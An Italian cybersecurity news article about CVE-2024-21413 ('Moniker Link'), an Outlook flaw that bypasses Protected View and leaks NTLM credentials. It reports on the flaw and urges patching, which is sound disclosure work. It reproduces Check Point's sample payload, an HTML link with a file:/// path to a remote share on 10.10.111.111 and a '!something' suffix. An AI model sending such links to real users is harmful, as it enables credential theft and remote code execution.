
Microsoft segnala che aggressori remoti non autenticati potrebbero sfruttare la vulnerabilità critica in Outlook. Tale bug potrebbe aggirare Office Protected View e ottenere l’esecuzione remota di codice arbitrario.
Questa vulnerabilità è stata scoperta dai ricercatori di Check Point e ha ricevuto l’identificatore CVE-2024-21413. Interessa numerosi prodotti Office, tra cui Microsoft Office LTSC 2021 e Microsoft 365 Apps for Enterprise, nonché Microsoft Outlook 2016 e Microsoft Office 2019.
Il bug porta all’esecuzione di codice in modalità remota quando si aprono e-mail con collegamenti dannosi utilizzando una versione vulnerabile di Microsoft Outlook. Il problema è che il bug consente di aggirare la Visualizzazione protetta. Si tratta di un meccanismo progettato per bloccare i contenuti dannosi incorporati nei file di Office e aprire i file di Office dannosi in modalità di modifica.
Gli sviluppatori hanno avvertito che le anteprime possono diventare anche un vettore di attacco. Questo poiché il CVE-2024-21413 può essere sfruttato anche attraverso l’anteprima di documenti dannosi.
“Un utente malintenzionato che sfrutta con successo questa vulnerabilità potrebbe ottenere privilegi elevati, comprese funzioni di lettura, scrittura ed eliminazione”, spiega Microsoft . “Un utente malintenzionato potrebbe creare un collegamento dannoso per aggirare la Visualizzazione protetta, portando alla perdita delle credenziali NTLM locali e all’esecuzione di codice remoto (RCE).”
Gli analisti di Check Point chiamano la vulnerabilità Moniker Link e affermano che consente di aggirare la protezione di Outlook contro i collegamenti dannosi incorporati nelle e-mail tramite file://. Devi solo aggiungere un punto esclamativo all’URL, che punta ai server controllati dagli aggressori.
Un punto esclamativo viene aggiunto immediatamente dopo l’espansione del documento, insieme al testo libero (Check Point ha utilizzato la parola “qualcosa” nell’esempio):*<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>*
Questo collegamento ignora le restrizioni di Outlook e Outlook accede alla risorsa remota \\\10.10.111.111\test\test.rtf quando si fa clic sul collegamento, senza visualizzare avvisi o errori.
Secondo i ricercatori, la vulnerabilità è legata all’API MkParseDisplayName, quindi potrebbe influenzare altri software che la utilizzano.
“Anche altre edizioni e versioni di Office sono probabilmente interessate da questo problema. In effetti, riteniamo che questo bug non sia stato rilevato ed esista nell’ecosistema Windows/COM da decenni perché è basato sull’API COM. Consigliamo vivamente a tutti gli utenti di Outlook di installare la patch ufficiale il prima possibile”, scrive Check Point.
Seguici su Google News, LinkedIn, Facebook e Instagram per ricevere aggiornamenti quotidiani sulla sicurezza informatica. Scrivici se desideri segnalarci notizie, approfondimenti o contributi da pubblicare.


Un nuovo strumento AI è apparso sul dark web e ha rapidamente attirato l’attenzione degli esperti di sicurezza, e non per le migliori ragioni. Si tratta di un servizio di intelligenza artificiale chiamato DIG AI,…

Negli ultimi mesi, una domanda sta emergendo con sempre maggiore insistenza nei board aziendali europei: il cloud statunitense è davvero sicuro per tutte le aziende? Soprattutto per quelle realtà che operano in settori strategici o…

Un nuovo e formidabile nemico è emerso nel panorama delle minacce informatiche: Kimwolf, una temibile botnet DDoS, sta avendo un impatto devastante sui dispositivi a livello mondiale. Le conseguenze di questa minaccia possono essere estremamente…

Ecco! Il 20 dicembre 1990, qualcosa di epocale successe al CERN di Ginevra. Tim Berners-Lee, un genio dell’informatica britannico, diede vita al primo sito web della storia. Si tratta di info.cern.ch, creato con l’obiettivo di…

Una giuria federale del Distretto del Nebraska ha incriminato complessivamente 54 persone accusate di aver preso parte a una vasta operazione criminale basata sull’uso di malware per sottrarre milioni di dollari dagli sportelli automatici statunitensi.…